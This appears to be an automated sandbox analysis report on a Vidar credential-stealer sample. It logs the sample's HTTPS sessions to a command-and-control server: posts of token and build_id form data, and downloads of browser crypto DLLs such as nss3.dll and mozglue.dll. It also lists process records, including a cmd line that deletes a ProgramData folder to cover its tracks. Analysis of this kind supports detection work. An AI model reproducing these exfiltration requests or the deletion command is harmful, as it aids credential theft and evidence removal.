                                                                                  2024-05-15 18:36:04 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------CBFIJEGIDBGIECAKKEGDCont
                                                                                  2024-05-15 18:36:05 UTC  158  IN  HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:05 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:36:05 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  11          192.168.2.4  49741        95.217.240.101  443               5984  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                  2024-05-15 18:36:06 UTC  325  OUT  POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDB
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 437
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:06 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------CFHCGHJDBFIIDGDHIJDBCont
                                                                                  2024-05-15 18:36:07 UTC  158  IN  HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:07 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:36:07 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  12          192.168.2.4  49742        95.217.240.101  443               5984  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                  2024-05-15 18:36:07 UTC  220  OUT  GET /freebl3.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:08 UTC  246  IN  HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:07 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 685392
                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                  Connection: close
                                                                                  ETag: "6315a9f4-a7550"
                                                                                  Accept-Ranges: bytes


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  13 | 192.168.2.4 | 49744 | 95.217.240.101 | 443 | 5984 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-05-15 18:36:09 UTC | 220 | OUT | GET /mozglue.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:10 UTC | 246 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:10 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 608080
                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                  Connection: close
                                                                                  ETag: "6315a9f4-94750"
                                                                                  Accept-Ranges: bytes


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  14 | 192.168.2.4 | 49750 | 95.217.240.101 | 443 | 5984 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-05-15 18:36:12 UTC | 221 | OUT | GET /msvcp140.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:13 UTC | 246 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:12 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 450024
                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                  Connection: close
                                                                                  ETag: "6315a9f4-6dde8"
                                                                                  Accept-Ranges: bytes
                                                                                  Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
15          192.168.2.4  49751        95.217.240.101  443               5984  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp                Bytes transferred  Direction  Data
2024-05-15 18:36:14 UTC  217                OUT        GET /nss3.dll HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                       Host: 95.217.240.101
                                                       Cache-Control: no-cache
2024-05-15 18:36:15 UTC  248                IN         HTTP/1.1 200 OK
                                                       Server: nginx
                                                       Date: Wed, 15 May 2024 18:36:15 GMT
                                                       Content-Type: application/octet-stream
                                                       Content-Length: 2046288
                                                       Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                       Connection: close
                                                       ETag: "6315a9f4-1f3950"
                                                       Accept-Ranges: bytes


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
16          192.168.2.4  49752        95.217.240.101  443               5984  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp                Bytes transferred  Direction  Data
2024-05-15 18:36:17 UTC  221                OUT        GET /softokn3.dll HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                       Host: 95.217.240.101
                                                       Cache-Control: no-cache
2024-05-15 18:36:18 UTC  246                IN         HTTP/1.1 200 OK
                                                       Server: nginx
                                                       Date: Wed, 15 May 2024 18:36:17 GMT
                                                       Content-Type: application/octet-stream
                                                       Content-Length: 257872
                                                       Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                       Connection: close
                                                       ETag: "6315a9f4-3ef50"
                                                       Accept-Ranges: bytes


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
17          192.168.2.4  49753        95.217.240.101  443               5984  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp                Bytes transferred  Direction  Data
2024-05-15 18:36:19 UTC  225                OUT        GET /vcruntime140.dll HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                       Host: 95.217.240.101
                                                       Cache-Control: no-cache
2024-05-15 18:36:20 UTC  245                IN         HTTP/1.1 200 OK
                                                       Server: nginx
                                                       Date: Wed, 15 May 2024 18:36:20 GMT
                                                       Content-Type: application/octet-stream
                                                       Content-Length: 80880
                                                       Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                       Connection: close
                                                       ETag: "6315a9f4-13bf0"
                                                       Accept-Ranges: bytes
                                                                                  Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49754 | 95.217.240.101 | 443 | 5984 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-15 18:36:21 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
Host: 95.217.240.101
Content-Length: 1145
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-15 18:36:21 UTC | 1145 | OUT | Data Ascii:
------JKFIDGDHJEGIEBFHDGDG
Content-Disposition: form-data; name="token"

5e2114c344718c2740c7f8c85866bab9
------JKFIDGDHJEGIEBFHDGDG
Content-Disposition: form-data; name="build_id"

9ed287469c3721fd5caf346580b2cf0d
------JKFIDGDHJEGIEBFHDGDG
Cont
2024-05-15 18:36:22 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 15 May 2024 18:36:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-15 18:36:22 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49755 | 95.217.240.101 | 443 | 5984 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-15 18:36:24 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
Host: 95.217.240.101
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-15 18:36:24 UTC | 331 | OUT | Data Ascii:
------FCFBFHIEBKJKFHIEBFBA
Content-Disposition: form-data; name="token"

5e2114c344718c2740c7f8c85866bab9
------FCFBFHIEBKJKFHIEBFBA
Content-Disposition: form-data; name="build_id"

9ed287469c3721fd5caf346580b2cf0d
------FCFBFHIEBKJKFHIEBFBA
Cont
2024-05-15 18:36:25 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 15 May 2024 18:36:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49756 | 95.217.240.101 | 443 | 5984 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-15 18:36:25 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
Host: 95.217.240.101
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-15 18:36:25 UTC | 331 | OUT | Data Ascii:
------CGIDAAAKJJDBGCBFCBGI
Content-Disposition: form-data; name="token"

5e2114c344718c2740c7f8c85866bab9
------CGIDAAAKJJDBGCBFCBGI
Content-Disposition: form-data; name="build_id"

9ed287469c3721fd5caf346580b2cf0d
------CGIDAAAKJJDBGCBFCBGI
Cont
2024-05-15 18:36:26 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 15 May 2024 18:36:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49757 | 95.217.240.101 | 443 | 5984 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-15 18:36:27 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
Host: 95.217.240.101
Content-Length: 453
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-15 18:36:27 UTC | 453 | OUT | Data Ascii:
------GCGHJEBGHJKEBFHIJDHC
Content-Disposition: form-data; name="token"

5e2114c344718c2740c7f8c85866bab9
------GCGHJEBGHJKEBFHIJDHC
Content-Disposition: form-data; name="build_id"

9ed287469c3721fd5caf346580b2cf0d
------GCGHJEBGHJKEBFHIJDHC
Cont
2024-05-15 18:36:27 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 15 May 2024 18:36:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-15 18:36:27 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49758 | 95.217.240.101 | 443 | 5984 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-15 18:36:29 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHII
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
Host: 95.217.240.101
Content-Length: 116501
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-15 18:36:29 UTC | 16355 | OUT | Data Ascii:
------AECAKECAEGDHIECBGHII
Content-Disposition: form-data; name="token"

5e2114c344718c2740c7f8c85866bab9
------AECAKECAEGDHIECBGHII
Content-Disposition: form-data; name="build_id"

9ed287469c3721fd5caf346580b2cf0d
------AECAKECAEGDHIECBGHII
Cont
2024-05-15 18:36:30 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 15 May 2024 18:36:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-15 18:36:30 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.44975995.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:36:31 UTC325OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJE
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:31 UTC | 331 | OUT | Data Ascii: ------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------JJDGCGHCGHCBFHJJKKJECont
                                                                                  2024-05-15 18:36:32 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:32 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:36:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  24 | 192.168.2.4 | 49760 | 95.217.240.101 | 443 | 5984 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-05-15 18:36:32 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIE
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:32 UTC | 331 | OUT | Data Ascii: ------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------DAAAFBKECAKEHIEBAFIECont
                                                                                  2024-05-15 18:36:33 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:36:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Target ID:0
                                                                                  Start time:20:35:49
                                                                                  Start date:15/05/2024
                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                  Imagebase:0x6e0000
                                                                                  File size:382'976 bytes
                                                                                  MD5 hash:B580FF2D001291BF58BDD23A058EF21B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:1
                                                                                  Start time:20:35:49
                                                                                  Start date:15/05/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:20:35:49
                                                                                  Start date:15/05/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                  Imagebase:0x4e0000
                                                                                  File size:65'440 bytes
                                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:20:35:49
                                                                                  Start date:15/05/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                  Imagebase:0x910000
                                                                                  File size:65'440 bytes
                                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:20:36:34
                                                                                  Start date:15/05/2024
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exit
                                                                                  Imagebase:0x7ff72bec0000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:8
                                                                                  Start time:20:36:34
                                                                                  Start date:15/05/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:9
                                                                                  Start time:20:36:34
                                                                                  Start date:15/05/2024
                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:timeout /t 10
                                                                                  Imagebase:0xd00000
                                                                                  File size:25'088 bytes
                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                    Execution Graph

                                                                                    Execution Coverage:6.2%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:2.4%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:75
std::_Throw_Cpp_error 15198->15199 15200 6e2493 45 API calls std::_Throw_Cpp_error 15199->15200 15202 6e200b 15199->15202 15204 6e2520 44 API calls std::_Throw_Cpp_error 15199->15204 15205 6e7031 codecvt 45 API calls 15199->15205 15208 6e1fe9 15199->15208 15572 6e33a0 15199->15572 15585 6e372b 15199->15585 15200->15199 15589 6e1d31 15202->15589 15204->15199 15205->15199 15582 6e244f 15208->15582 15210 6e1ff2 15211 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15210->15211 15212 6e2004 15211->15212 15212->15176 15832 6e3b4e 15213->15832 15215 6e697c 15839 6e3b5a 15215->15839 15218 6e6918 15218->15215 15835 6e6fa7 15218->15835 15838 6e6fc5 WakeAllConditionVariable 15218->15838 15222 6e24b0 std::_Throw_Cpp_error 15221->15222 15266 6e2b05 15222->15266 15224 6e2214 15225 6e7031 15224->15225 15226 6e7036 ___std_exception_copy 15225->15226 15227 6e7050 15226->15227 15229 6e7052 15226->15229 15520 6ef569 15226->15520 15227->15185 15230 6e12bf Concurrency::cancel_current_task 15229->15230 15231 6e705c codecvt 15229->15231 15232 6e8413 CallUnexpected RaiseException 15230->15232 15234 6e8413 CallUnexpected RaiseException 15231->15234 15233 6e12db 15232->15233 15235 6e1235 Concurrency::cancel_current_task 44 API calls 15233->15235 15236 6e7a2e 15234->15236 15237 6e12e8 15235->15237 15237->15185 15239 6e210b 15238->15239 15247 6e2042 15238->15247 15534 6e2429 15239->15534 15242 6e2493 45 API calls std::_Throw_Cpp_error 15242->15247 15243 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15244 6e2125 15243->15244 15244->15187 15245 6e2546 45 API calls 15245->15247 15246 6ec59e 47 API calls 15246->15247 15247->15239 15247->15242 15247->15245 15247->15246 15248 6e2520 44 API calls std::_Throw_Cpp_error 15247->15248 15248->15247 15250 6e1d58 15249->15250 15251 6e1dc5 15250->15251 15549 6e35ea 15250->15549 15253 6e1dd8 15251->15253 15254 6e2d2c _Deallocate 44 API calls 15251->15254 15253->15190 15254->15253 15256 6e252b 
